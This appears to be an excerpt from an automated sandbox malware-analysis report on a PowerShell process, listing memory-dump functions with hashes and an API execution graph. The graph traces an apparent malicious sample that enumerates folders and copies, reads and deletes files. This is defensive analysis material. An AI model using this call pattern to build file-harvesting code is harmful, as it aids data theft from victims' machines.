                      Memory Dump Source
                      • Source File: 0000000E.00000002.1724652204.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7750000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: eaf65b007a317f2a3b7684007814ac9134969de0790d73fbe066828f61be4ff9
                      • Instruction ID: 337d81f2c274040d5c2b7974d79af722e4b3d628544dba81e0ffc974e154aa30
                      • Opcode Fuzzy Hash: eaf65b007a317f2a3b7684007814ac9134969de0790d73fbe066828f61be4ff9
                      • Instruction Fuzzy Hash: D0917EB0B102049FD714DB54C854BADBBF2AF86754FA0C469E905AB791CB71EC81CB61
                      Function 03008DE8 Relevance: .2, Instructions: 207COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1714091363.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_3000000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 05387efa11e32a3fe74c82cc565f8287398dbb251ced7f9f02b354bd436e1476
                      • Instruction ID: b6e15d543cc8e3553a4bdebfb660899883e4852508fa88bdbc25bd6f9b38a8ca
                      • Opcode Fuzzy Hash: 05387efa11e32a3fe74c82cc565f8287398dbb251ced7f9f02b354bd436e1476
                      • Instruction Fuzzy Hash: 7A818334A02244DFDB15DFA4D484AADBBF2FF89314F1884A9E4459B3A2CB35EC85CB51
                      Function 03009D48 Relevance: .2, Instructions: 190COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1714091363.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_3000000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a35e26a7c2b5329c92e27d424569edd738c2f6c642598d586741a8b693d5fb2c
                      • Instruction ID: 1caa5cb5ed7f95d07189fc00323af615ea93039c0c71ea8792dce4323db8942f
                      • Opcode Fuzzy Hash: a35e26a7c2b5329c92e27d424569edd738c2f6c642598d586741a8b693d5fb2c
                      • Instruction Fuzzy Hash: AC71AF30A01249CFDB14DF68C880A9EFBF6BF85358F248969D455DB7A1DB71AC46CB80
                      Function 03009EB6 Relevance: .2, Instructions: 188COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1714091363.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_3000000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8f1f65c5501279d90a022bb57a5038195b58206a703d1f97e5e963a029a9762c
                      • Instruction ID: de06d78f71cea83438746274932d11fd285fadf8a3f257aef54842b2cc87241d
                      • Opcode Fuzzy Hash: 8f1f65c5501279d90a022bb57a5038195b58206a703d1f97e5e963a029a9762c
                      • Instruction Fuzzy Hash: EC714B30E01248DFDB14DFA5D894BADBBF2BF88348F148469D415AB7A1DB71AC86CB41
                      Function 0775B046 Relevance: .1, Instructions: 122COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1724652204.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7750000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a89350489f48eada17dc27e1b5339ab99ca53fe6c7314a68ef014fdffb3c4f3b
                      • Instruction ID: 190ba3cf6b8d4fa1cf256e26aacab43eda204828357a5e0212e0db5770cc2f88
                      • Opcode Fuzzy Hash: a89350489f48eada17dc27e1b5339ab99ca53fe6c7314a68ef014fdffb3c4f3b
                      • Instruction Fuzzy Hash: 884117F1B00301CFCB248F149501BBEBBA2AF852D4F54896ADD049F6A1DB71D885C7B1
                      Function 03009AD9 Relevance: .1, Instructions: 119COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1714091363.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_3000000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ab15d1610c5cf2a7da52cc8dc82d1663c19454a4f78e9dcdbe0548e72aff17d7
                      • Instruction ID: 0a119caa3de92197d5a9f92d632b0f00ff520acea9dac79df64e093de0a3607d
                      • Opcode Fuzzy Hash: ab15d1610c5cf2a7da52cc8dc82d1663c19454a4f78e9dcdbe0548e72aff17d7
                      • Instruction Fuzzy Hash: 6A417C31A40204CFEB14DB64C598AADBBF2BF89754F18446DE402EB7A1DF359C42CB50
                      Function 03009D33 Relevance: .1, Instructions: 118COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1714091363.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_3000000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 9856441657e607e8ba5d335041013872dc25193d376b2ae3360b90966bb00eb6
                      • Instruction ID: 15103786ad42089173353f4585570246ae4ca93756abd260ade16a38f23c6e67
                      • Opcode Fuzzy Hash: 9856441657e607e8ba5d335041013872dc25193d376b2ae3360b90966bb00eb6
                      • Instruction Fuzzy Hash: 10414C30E002489FDB14DFA5C844B9DBBF2BF85358F248969D415AB7A1DB71AC46CB81
                      Function 07754493 Relevance: .1, Instructions: 117COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1724652204.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7750000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d967ce37d23209d848299715ad1600c90d4601cf8713ba36f2d24621457b3230
                      • Instruction ID: 6de7b5e4a00026490dedc751b6a32b6a9fc0a4e5e9573e1431298a52f3545494
                      • Opcode Fuzzy Hash: d967ce37d23209d848299715ad1600c90d4601cf8713ba36f2d24621457b3230
                      • Instruction Fuzzy Hash: A94113B470D3C19FC7178B648855A95BFB1AF83251B2D84DBC844CF1A3D6A68C8BC722
                      Function 07759016 Relevance: .1, Instructions: 102COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1724652204.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7750000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 086a0c6c30b697299370acc317f7a1b271d8a1d997ed17ef6591bb66dd36b4ed
                      • Instruction ID: f79a630ceb6501df036aaa5db4198a0f7cf11952975e9de323c2be5f24b38260
                      • Opcode Fuzzy Hash: 086a0c6c30b697299370acc317f7a1b271d8a1d997ed17ef6591bb66dd36b4ed
                      • Instruction Fuzzy Hash: AE318B70B003189FE7149B64C854BAE7AA3AF85344F50C429EA056F7D5CF76DC428B91
                      Function 030039D8 Relevance: .1, Instructions: 81COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1714091363.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_3000000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6c2ea7b4e5a5d0863f0adb63aa96cd7b04b71e54e0f69d1e0cd6219bb81b98a7
                      • Instruction ID: 8ea8498b2afc85c2fa24fc3d30f10a1832abbba086b43c6c7f6d22862248a383
                      • Opcode Fuzzy Hash: 6c2ea7b4e5a5d0863f0adb63aa96cd7b04b71e54e0f69d1e0cd6219bb81b98a7
                      • Instruction Fuzzy Hash: 0421AD75E052559FDB02CF58D8919AABBB4FF4A210B0481DAE805EB3A2C335ED45CBA1
                      Function 030045B1 Relevance: .1, Instructions: 66COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1714091363.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_3000000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2d920e343c0ba0c9f9506cfe7fe766b0eec4ceeedc834207dc9ddb157eebdfd4
                      • Instruction ID: 13254efcc4429cb9963c50befb7b18c00da3c87d3026b99270f33ba99af74d8c
                      • Opcode Fuzzy Hash: 2d920e343c0ba0c9f9506cfe7fe766b0eec4ceeedc834207dc9ddb157eebdfd4
                      • Instruction Fuzzy Hash: 3A211674A006099FDB04CF89C4909AAFBF1FF48310B158599E949EB761C731EC92CFA5
                      Function 030039C8 Relevance: .1, Instructions: 60COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1714091363.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_3000000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6029ac658024e577d3f416361ce3809373459d85741a878fef29772b3599d137
                      • Instruction ID: 01ea0eb2b97a73c7d34792e760625ec22180c7bf1a4720fa004c3a0256c3a8d6
                      • Opcode Fuzzy Hash: 6029ac658024e577d3f416361ce3809373459d85741a878fef29772b3599d137
                      • Instruction Fuzzy Hash: F1210874E042499FDB01DF98C8909AAFBB1FF4A310B158599E849AB352C735ED41CBA1
                      Function 02F9D01D Relevance: .0, Instructions: 45COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1713923029.0000000002F9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F9D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_2f9d000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 34fcd80715c1babeb7e0c795f9f8d1b673a64e8dd238fba92c34df1276e35ca1
                      • Instruction ID: a73ccf490470a0ca1b1c4f0826e1b71038c7be7ec56e695f6a941187f2555d37
                      • Opcode Fuzzy Hash: 34fcd80715c1babeb7e0c795f9f8d1b673a64e8dd238fba92c34df1276e35ca1
                      • Instruction Fuzzy Hash: 0B012B319043049FFB206A11CCC4B67FF98DF41AA5F28C119DE480F196C3799846CBB1
                      Function 02F9D005 Relevance: .0, Instructions: 45COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1713923029.0000000002F9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F9D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_2f9d000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 82feb15078a30daadcc86f60197e02261e2cd489cc20f8e9226d45dd98586295
                      • Instruction ID: 2c5938cbaf0cf4c1693d64f2f5e9342dc1e5ffa4e22fd09216ad55d1a791eb65
                      • Opcode Fuzzy Hash: 82feb15078a30daadcc86f60197e02261e2cd489cc20f8e9226d45dd98586295
                      • Instruction Fuzzy Hash: 92019E7140E3C09FE7168B218C94B52BFB4DF43624F1D80DBD9888F1A7C2695849C772

                      Non-executed Functions

                      Function 07750BB0 Relevance: 18.0, Strings: 14, Instructions: 466COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1724652204.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7750000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: (oq$(oq$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$tPq$tPq$tPq$tPq
                      • API String ID: 0-4031905499
                      • Opcode ID: e4ec7ac22103834f2eff7dfd8af0cd661c88a2bc7606cccd3684a393363f46ae
                      • Instruction ID: 31603359aa080f70f3bebdd862e04e73b3804faa0050ab899461520aa4abc967
                      • Opcode Fuzzy Hash: e4ec7ac22103834f2eff7dfd8af0cd661c88a2bc7606cccd3684a393363f46ae
                      • Instruction Fuzzy Hash: 42F1D3B0B00219DFDB24DF68D4457ADBBA2BF89391F248469ED059B350CBB1DC82CB91
                      Function 07753658 Relevance: 12.8, Strings: 10, Instructions: 308COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1724652204.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7750000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: 4'q$4'q$4'q$4'q$$q$$q$$q$$q$$q$$q
                      • API String ID: 0-4104424984
                      • Opcode ID: 49a54a50a097e665d82ff113388ed36dd2e76ea9bc41a9c0359815123d2f4232
                      • Instruction ID: 958335f9ac1019322ecdc560c1b3e06e0d350f204ccfd6ed85176b7863196bce
                      • Opcode Fuzzy Hash: 49a54a50a097e665d82ff113388ed36dd2e76ea9bc41a9c0359815123d2f4232
                      • Instruction Fuzzy Hash: AEA15CF1B043069FDB284B25985477A7BA1EF826DDF24887ADC05CB2A1DB71DC41C7A1
                      Function 07751450 Relevance: 6.6, Strings: 5, Instructions: 305COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1724652204.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7750000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: 4'q$4'q$tPq$tPq$tPq
                      • API String ID: 0-1844223728
                      • Opcode ID: 51b539614346899f82e3e9b906f4ee5becd8e279394593cc76fe5c4579508cef
                      • Instruction ID: 5443dc916bbce052c7a1c5fecaffdfe496a6cc4e2caab27ae302df60177c8697
                      • Opcode Fuzzy Hash: 51b539614346899f82e3e9b906f4ee5becd8e279394593cc76fe5c4579508cef
                      • Instruction Fuzzy Hash: 50A15FB1B043098FDB20976994417A6BBE2EF85392F58C9AADD06CB241DEB1CC41C7A1
                      Function 0775E508 Relevance: 6.4, Strings: 5, Instructions: 185COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1724652204.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7750000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: 4'q$tPq$$q$$q$$q
                      • API String ID: 0-838716513
                      • Opcode ID: 08c0a0ccb4c3da253b3fb91e858e61563e23c4a3eafedd70af969058c682d811
                      • Instruction ID: 8d13c93f6611f79f2f2a44b4272d78dee791d98ea2548c1ec0669dd3d1f07b4e
                      • Opcode Fuzzy Hash: 08c0a0ccb4c3da253b3fb91e858e61563e23c4a3eafedd70af969058c682d811
                      • Instruction Fuzzy Hash: 23616DF0B10206DFDB248F14C5457AA77A6EF453D5F1889AAEC015F290DBF5EA80CBA1
                      Function 07752C7D Relevance: 6.4, Strings: 5, Instructions: 119COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1724652204.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7750000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: 4'q$tPq$$q$$q$$q
                      • API String ID: 0-838716513
                      • Opcode ID: 9be439e2238a563a35dd9a26ab9561e0990d26c82db8c8cd20d0bd1831967463
                      • Instruction ID: edb21ce06a082eac02f85040680e8b7ae6e64879b7148520213f3780e2c05ca1
                      • Opcode Fuzzy Hash: 9be439e2238a563a35dd9a26ab9561e0990d26c82db8c8cd20d0bd1831967463
                      • Instruction Fuzzy Hash: FE41D2F2A00306EFDB258F14D445BA5B7B1BF453A0F1884AAEC155F293CBB1D941CBA1
                      Function 077553BD Relevance: 6.4, Strings: 5, Instructions: 109COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1724652204.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7750000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: 4'q$4'q$$q$$q$$q
                      • API String ID: 0-170447905
                      • Opcode ID: a5dc5d129dab7376592ff0715d8594d2e2b362cd7d35e3a0485670df4ac04683
                      • Instruction ID: 8a98e296af540caafb6f8d0b076cce4568d2b25fd97cec9c4ef635013f4eca20
                      • Opcode Fuzzy Hash: a5dc5d129dab7376592ff0715d8594d2e2b362cd7d35e3a0485670df4ac04683
                      • Instruction Fuzzy Hash: 82313BB2B04306CFDB354B65A440276B7A3FFC52D6B38887ADD168B141EAB5C472C752
                      Function 077512EA Relevance: 6.3, Strings: 5, Instructions: 63COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1724652204.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7750000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: 4'q$4'q$4'q$$q$$q
                      • API String ID: 0-1195628130
                      • Opcode ID: a557508f6e62b4cac439d49a1dac1c7a924cce137a0ef7de581ad0e8d0907ee0
                      • Instruction ID: 74574c65ec1c93e222139a4101f8826452a3acbe6ce8d0c87bbc82767bb77910
                      • Opcode Fuzzy Hash: a557508f6e62b4cac439d49a1dac1c7a924cce137a0ef7de581ad0e8d0907ee0
                      • Instruction Fuzzy Hash: 70112961B0924A4BD726136938302596F739FC269276E84ABD841CB652CD958C478397
                      Function 0775CF88 Relevance: 5.5, Strings: 4, Instructions: 492COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1724652204.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7750000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: (oq$(oq$(oq$(oq
                      • API String ID: 0-3853041632
                      • Opcode ID: e4b156f695c72956e4e9cb33591a2cd5642ff2cb033e63b584efa0615d79cd38
                      • Instruction ID: bb8b43e5422075bf7dd2bbfda97e8a56f322ba0bbf200c69941f710a199e39eb
                      • Opcode Fuzzy Hash: e4b156f695c72956e4e9cb33591a2cd5642ff2cb033e63b584efa0615d79cd38
                      • Instruction Fuzzy Hash: 38F15CB1704306DFDB349F68D8847AABBA2FF85391F14886ADD05CB291DBB1D842C761
                      Function 07750B8F Relevance: 5.3, Strings: 4, Instructions: 255COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1724652204.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7750000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: 4'q$4'q$tPq$tPq
                      • API String ID: 0-1392854178
                      • Opcode ID: 2b1f0aba690fce6737b592cf07028725796a9cd0be8392b88fe9945850306903
                      • Instruction ID: f8dd4cdbe6a4d28667ff846d3308051fb857c743eac72455a3947173b1a25260
                      • Opcode Fuzzy Hash: 2b1f0aba690fce6737b592cf07028725796a9cd0be8392b88fe9945850306903
                      • Instruction Fuzzy Hash: 2FA1B1B1A00319DFDB24CF68D584BA9BBB2BF49394F19849AEC059F251C7B1DC81CB91
                      Function 077523A8 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1724652204.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7750000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: $q$$q$$q$$q
                      • API String ID: 0-4102054182
                      • Opcode ID: 91445a9c8925d818c768fc36f510491b2499781d080652d9510fbc45afa9d5a5
                      • Instruction ID: a85d0ffeac6a860886e760b986e2dbc4b51468414d682fc1bde26e424bbc2080
                      • Opcode Fuzzy Hash: 91445a9c8925d818c768fc36f510491b2499781d080652d9510fbc45afa9d5a5
                      • Instruction Fuzzy Hash: A02127F13103069BEB34562AA841727B796BBC53D5F24883AAD05CB3C2DEB5DC418362

                      Execution Graph

                      Execution Coverage:2.2%
                      Dynamic/Decrypted Code Coverage:100%
                      Signature Coverage:5.6%
                      Total number of Nodes:214
                      Total number of Limit Nodes:5
                      execution_graph 6654 2457c7a7 6655 2457c7be 6654->6655 6661 2457c82c 6654->6661 6655->6661 6666 2457c7e6 GetModuleHandleA 6655->6666 6657 2457c835 GetModuleHandleA 6659 2457c83f 6657->6659 6658 2457c872 6659->6659 6659->6661 6662 2457c85f GetProcAddress 6659->6662 6660 2457c7dd 6660->6659 6660->6661 6663 2457c800 GetProcAddress 6660->6663 6661->6657 6661->6658 6661->6659 6662->6661 6663->6661 6664 2457c80d VirtualProtect 6663->6664 6664->6661 6665 2457c81c VirtualProtect 6664->6665 6665->6661 6667 2457c7ef 6666->6667 6674 2457c82c 6666->6674 6678 2457c803 GetProcAddress 6667->6678 6669 2457c835 GetModuleHandleA 6676 2457c83f 6669->6676 6670 2457c872 6671 2457c7f4 6672 2457c800 GetProcAddress 6671->6672 6671->6674 6673 2457c80d VirtualProtect 6672->6673 6672->6674 6673->6674 6675 2457c81c VirtualProtect 6673->6675 6674->6669 6674->6670 6674->6676 6675->6674 6676->6674 6677 2457c85f GetProcAddress 6676->6677 6677->6674 6679 2457c82c 6678->6679 6680 2457c80d VirtualProtect 6678->6680 6682 2457c835 GetModuleHandleA 6679->6682 6683 2457c872 6679->6683 6680->6679 6681 2457c81c VirtualProtect 6680->6681 6681->6679 6684 2457c83f 6682->6684 6684->6679 6685 2457c85f GetProcAddress 6684->6685 6685->6684 6686 24571c5b 6687 24571c6b ___scrt_fastfail 6686->6687 6690 245712ee 6687->6690 6689 24571c87 6691 24571324 ___scrt_fastfail 6690->6691 6692 245713b7 GetEnvironmentVariableW 6691->6692 6716 245710f1 6692->6716 6695 245710f1 57 API calls 6696 24571465 6695->6696 6697 245710f1 57 API calls 6696->6697 6698 24571479 6697->6698 6699 245710f1 57 API calls 6698->6699 6700 2457148d 6699->6700 6701 245710f1 57 API calls 6700->6701 6702 245714a1 6701->6702 6703 245710f1 57 API calls 6702->6703 6704 245714b5 lstrlenW 6703->6704 6705 245714d9 lstrlenW 6704->6705 6715 245714d2 6704->6715 6706 245710f1 57 API calls 6705->6706 6707 24571501 lstrlenW lstrcatW 6706->6707 6708 245710f1 57 API calls 6707->6708 6709 24571539 lstrlenW lstrcatW 6708->6709 6710 245710f1 57 API calls 6709->6710 6711 2457156b lstrlenW lstrcatW 6710->6711 6712 245710f1 57 API calls 6711->6712 6713 2457159d lstrlenW lstrcatW 6712->6713 6714 245710f1 57 API calls 6713->6714 6714->6715 6715->6689 6717 24571118 ___scrt_fastfail 6716->6717 6718 24571129 lstrlenW 6717->6718 6729 24572c40 6718->6729 6721 24571177 lstrlenW FindFirstFileW 6723 245711e1 6721->6723 6724 245711a0 6721->6724 6722 24571168 lstrlenW 6722->6721 6723->6695 6725 245711c7 FindNextFileW 6724->6725 6726 245711aa 6724->6726 6725->6724 6728 245711da FindClose 6725->6728 6726->6725 6731 24571000 6726->6731 6728->6723 6730 24571148 lstrcatW lstrlenW 6729->6730 6730->6721 6730->6722 6732 24571022 ___scrt_fastfail 6731->6732 6733 245710af 6732->6733 6734 2457102f lstrcatW lstrlenW 6732->6734 6737 245710b5 lstrlenW 6733->6737 6738 245710ad 6733->6738 6735 2457106b lstrlenW 6734->6735 6736 2457105a lstrlenW 6734->6736 6748 24571e89 lstrlenW 6735->6748 6736->6735 6762 24571e16 6737->6762 6738->6726 6741 24571088 GetFileAttributesW 6741->6738 6743 2457109c 6741->6743 6742 245710ca 6742->6738 6744 24571e89 5 API calls 6742->6744 6743->6738 6754 2457173a 6743->6754 6745 245710df 6744->6745 6767 245711ea 6745->6767 6749 24572c40 ___scrt_fastfail 6748->6749 6750 24571ea7 lstrcatW lstrlenW 6749->6750 6751 24571ec2 6750->6751 6752 24571ed1 lstrcatW 6750->6752 6751->6752 6753 24571ec7 lstrlenW 6751->6753 6752->6741 6753->6752 6755 24571747 ___scrt_fastfail 6754->6755 6782 24571cca 6755->6782 6758 2457199f 6758->6738 6760 24571824 ___scrt_fastfail _strlen 6760->6758 6802 245715da 6760->6802 6763 24571e29 6762->6763 6766 24571e4c 6762->6766 6764 24571e2d lstrlenW 6763->6764 6763->6766 6765 24571e3f lstrlenW 6764->6765 6764->6766 6765->6766 6766->6742 6768 2457120e ___scrt_fastfail 6767->6768 6769 24571e89 5 API calls 6768->6769 6770 24571220 GetFileAttributesW 6769->6770 6771 24571246 6770->6771 6772 24571235 6770->6772 6773 24571e89 5 API calls 6771->6773 6772->6771 6774 2457173a 35 API calls 6772->6774 6775 24571258 6773->6775 6774->6771 6776 245710f1 56 API calls 6775->6776 6777 2457126d 6776->6777 6778 24571e89 5 API calls 6777->6778 6779 2457127f ___scrt_fastfail 6778->6779 6780 245710f1 56 API calls 6779->6780 6781 245712e6 6780->6781 6781->6738 6783 24571cf1 ___scrt_fastfail 6782->6783 6784 24571d0f CopyFileW CreateFileW 6783->6784 6785 24571d55 GetFileSize 6784->6785 6786 24571d44 DeleteFileW 6784->6786 6787 24571ede 22 API calls 6785->6787 6791 24571808 6786->6791 6788 24571d66 ReadFile 6787->6788 6789 24571d94 CloseHandle DeleteFileW 6788->6789 6790 24571d7d CloseHandle DeleteFileW 6788->6790 6789->6791 6790->6791 6791->6758 6792 24571ede 6791->6792 6794 2457222f 6792->6794 6795 2457224e 6794->6795 6798 24572250 6794->6798 6810 2457474f 6794->6810 6815 245747e5 6794->6815 6795->6760 6797 24572908 6799 245735d2 __CxxThrowException@8 RaiseException 6797->6799 6798->6797 6822 245735d2 6798->6822 6801 24572925 6799->6801 6801->6760 6803 2457160c _strlen 6802->6803 6804 2457163c lstrlenW 6803->6804 6910 24571c9d 6804->6910 6806 24571655 lstrcatW lstrlenW 6807 24571678 6806->6807 6808 24571693 ___scrt_fastfail 6807->6808 6809 2457167e lstrcatW 6807->6809 6808->6760 6809->6808 6825 24574793 6810->6825 6812 24574765 6831 24572ada 6812->6831 6814 2457478f 6814->6794 6820 245756d0 __dosmaperr 6815->6820 6816 2457570e 6844 24576368 6816->6844 6817 245756f9 RtlAllocateHeap 6819 2457570c 6817->6819 6817->6820 6819->6794 6820->6816 6820->6817 6821 2457474f __dosmaperr 7 API calls 6820->6821 6821->6820 6824 245735f2 RaiseException 6822->6824 6824->6797 6826 2457479f ___scrt_is_nonwritable_in_current_image 6825->6826 6838 24575671 RtlEnterCriticalSection 6826->6838 6828 245747aa 6839 245747dc 6828->6839 6830 245747d1 _abort 6830->6812 6832 24572ae5 IsProcessorFeaturePresent 6831->6832 6833 24572ae3 6831->6833 6835 24572b58 6832->6835 6833->6814 6843 24572b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 6835->6843 6837 24572c3b 6837->6814 6838->6828 6842 245756b9 RtlLeaveCriticalSection 6839->6842 6841 245747e3 6841->6830 6842->6841 6843->6837 6847 24575b7a GetLastError 6844->6847 6848 24575b93 6847->6848 6849 24575b99 6847->6849 6866 24575e08 6848->6866 6853 24575bf0 SetLastError 6849->6853 6873 2457637b 6849->6873 6855 24575bf9 6853->6855 6854 24575bb3 6880 2457571e 6854->6880 6855->6819 6859 24575bcf 6893 2457593c 6859->6893 6860 24575bb9 6862 24575be7 SetLastError 6860->6862 6862->6855 6864 2457571e _free 17 API calls 6865 24575be0 6864->6865 6865->6853 6865->6862 6898 24575c45 6866->6898 6868 24575e2f 6869 24575e47 TlsGetValue 6868->6869 6870 24575e3b 6868->6870 6869->6870 6871 24572ada _ValidateLocalCookies 5 API calls 6870->6871 6872 24575e58 6871->6872 6872->6849 6878 24576388 __dosmaperr 6873->6878 6874 245763c8 6876 24576368 __dosmaperr 19 API calls 6874->6876 6875 245763b3 RtlAllocateHeap 6877 24575bab 6875->6877 6875->6878 6876->6877 6877->6854 6886 24575e5e 6877->6886 6878->6874 6878->6875 6879 2457474f __dosmaperr 7 API calls 6878->6879 6879->6878 6881 24575752 __dosmaperr 6880->6881 6882 24575729 HeapFree 6880->6882 6881->6860 6882->6881 6883 2457573e 6882->6883 6884 24576368 __dosmaperr 18 API calls 6883->6884 6885 24575744 GetLastError 6884->6885 6885->6881 6887 24575c45 __dosmaperr 5 API calls 6886->6887 6888 24575e85 6887->6888 6889 24575ea0 